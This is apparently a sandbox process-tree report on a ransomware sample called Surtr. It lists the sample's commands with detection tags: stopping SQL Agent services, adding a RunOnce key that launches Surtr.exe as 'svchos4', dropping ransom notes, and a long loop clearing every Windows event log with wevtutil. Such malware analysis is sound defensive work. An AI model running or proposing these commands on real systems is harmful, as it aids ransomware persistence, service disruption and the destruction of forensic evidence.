[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  - Adds Run key to start application
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
[4] C:\Windows\system32\net.exe | net stop "SQLAgent$PRACTTICEBGC"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
[4] C:\Windows\system32\net.exe | net stop "SQLAgent$PROFXENGAGEMENT"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
[4] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wevtutil.exe el
[5] C:\Windows\system32\wevtutil.exe | wevtutil.exe el
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Analytic"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Application"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "DebugChannel"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "DirectShowFilterGraph"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "DirectShowPluginControl"
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Els_Hyphenation/Analytic"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "EndpointMapper"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "ForwardedEvents"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "HardwareEvents"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Internet Explorer"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Key Management Service"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Media Center"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationDeviceProxy"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationPerformance"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationPipeline"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationPlatform"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-IE/Diagnostic"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
  - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Backup"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
  - Clears Windows event logs
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
[4] C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Analytic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HAL/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Help/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HttpService/Trace"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKE/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Known Folders API Service"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"4⤵
- Clears Windows event logs
-
